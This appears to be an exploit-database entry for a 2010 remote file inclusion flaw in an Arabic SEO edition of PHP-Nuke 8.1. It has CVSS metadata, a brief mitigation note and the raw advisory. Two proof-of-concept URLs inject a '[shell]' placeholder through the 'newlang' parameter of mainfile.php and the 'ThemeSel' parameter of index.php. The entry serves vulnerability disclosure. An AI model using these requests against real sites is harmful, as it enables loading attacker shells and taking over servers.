PHP-Nuke-8.1-seo-Arabic Remote File Include

vendor:

PHP-Nuke

by:

LoSt.HaCkEr

5.5

CVSS

MEDIUM

Remote File Inclusion

CWE

Product Name: PHP-Nuke

Affected Version From: 8.1

Affected Version To: 8.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP

2010

PHP-Nuke-8.1-seo-Arabic Remote File Include

The PHP-Nuke-8.1-seo-Arabic script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file through the 'newlang' parameter in the 'mainfile.php' or the 'ThemeSel' parameter in the 'index.php' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of PHP-Nuke or apply necessary security patches.

Source

Exploit-DB raw data:

# Exploit Title: [PHP-Nuke-8.1-seo-Arabic Remote File Include ] 
# Date: [12-8-2010] # Author: LoSt.HaCkEr 
# Software Link: [http://scripts.bdr130.net/faile/PHP-Nuke-8.1-seo-Arabic.zip] # Version: [v 8.1] # Tested on: [Windows XP] 
# CVE : [هكر المسيب]
#Contact: LoSt.HaCkEr[at]yahoo[dot]com____________________________________

Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/mainfile.php?newlang=[shell]____________________________________________

Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/index.php?ThemeSel=[shell]____________________________________________

A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers